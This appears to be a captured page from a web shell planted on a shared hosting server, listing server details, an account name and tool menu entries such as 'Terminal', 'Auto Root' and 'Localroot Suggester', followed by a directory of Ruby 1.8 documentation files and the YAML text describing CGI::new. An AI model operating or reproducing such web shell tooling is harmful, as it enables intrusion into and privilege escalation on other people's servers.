Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.155
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
CGI /
Delete
Unzip
Name
Size
Permission
Date
Action
Cookie
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
Html3
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
Html4
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
Html4Fr
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
Html4Tr
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
HtmlExtension
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
QueryExtension
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
Session
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
TagMaker
[ DIR ]
drwxr-xr-x
2024-03-03 22:50
cdesc-CGI.yaml
12.56
KB
-rw-r--r--
2023-07-26 13:47
cookie-c.yaml
229
B
-rw-r--r--
2023-07-26 13:47
env_table-i.yaml
170
B
-rw-r--r--
2023-07-26 13:47
error-c.yaml
235
B
-rw-r--r--
2023-07-26 13:47
escape-c.yaml
220
B
-rw-r--r--
2023-07-26 13:47
escapeElement-c.yaml
1.08
KB
-rw-r--r--
2023-07-26 13:47
escapeHTML-c.yaml
460
B
-rw-r--r--
2023-07-26 13:47
header-c.yaml
231
B
-rw-r--r--
2023-07-26 13:47
header-i.yaml
4.86
KB
-rw-r--r--
2023-07-26 13:47
message-c.yaml
287
B
-rw-r--r--
2023-07-26 13:47
new-c.yaml
1.3
KB
-rw-r--r--
2023-07-26 13:47
out-i.yaml
2.05
KB
-rw-r--r--
2023-07-26 13:47
parse-c.yaml
520
B
-rw-r--r--
2023-07-26 13:47
pretty-c.yaml
823
B
-rw-r--r--
2023-07-26 13:47
print-c.yaml
262
B
-rw-r--r--
2023-07-26 13:47
print-i.yaml
395
B
-rw-r--r--
2023-07-26 13:47
read_from_cmdline-i.yaml
276
B
-rw-r--r--
2023-07-26 13:47
rfc1123_date-c.yaml
240
B
-rw-r--r--
2023-07-26 13:47
stdinput-i.yaml
168
B
-rw-r--r--
2023-07-26 13:47
stdoutput-i.yaml
170
B
-rw-r--r--
2023-07-26 13:47
tag-c.yaml
355
B
-rw-r--r--
2023-07-26 13:47
unescape-c.yaml
227
B
-rw-r--r--
2023-07-26 13:47
unescapeElement-c.yaml
782
B
-rw-r--r--
2023-07-26 13:47
unescapeHTML-c.yaml
462
B
-rw-r--r--
2023-07-26 13:47
Save
Rename
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Creates a new CGI instance. - !ruby/struct:SM::Flow::P body: "<tt>type</tt> specifies which version of HTML to load the HTML generation methods for. The following versions of HTML are supported:" - !ruby/object:SM::Flow::LIST contents: - !ruby/struct:SM::Flow::LI label: "html3:" body: HTML 3.x - !ruby/struct:SM::Flow::LI label: "html4:" body: HTML 4.0 - !ruby/struct:SM::Flow::LI label: "html4Tr:" body: HTML 4.0 Transitional - !ruby/struct:SM::Flow::LI label: "html4Fr:" body: HTML 4.0 with Framesets type: :NOTE - !ruby/struct:SM::Flow::P body: If not specified, no HTML generation methods will be loaded. - !ruby/struct:SM::Flow::P body: If the CGI object is not created in a standard CGI call environment (that is, it can't locate REQUEST_METHOD in its environment), then it will run in "offline" mode. In this mode, it reads its parameters from the command line or (failing that) from standard input. Otherwise, cookies and other parameters are parsed automatically from the standard CGI locations, which varies according to the REQUEST_METHOD. full_name: CGI::new is_singleton: true name: new params: (type = "query") visibility: public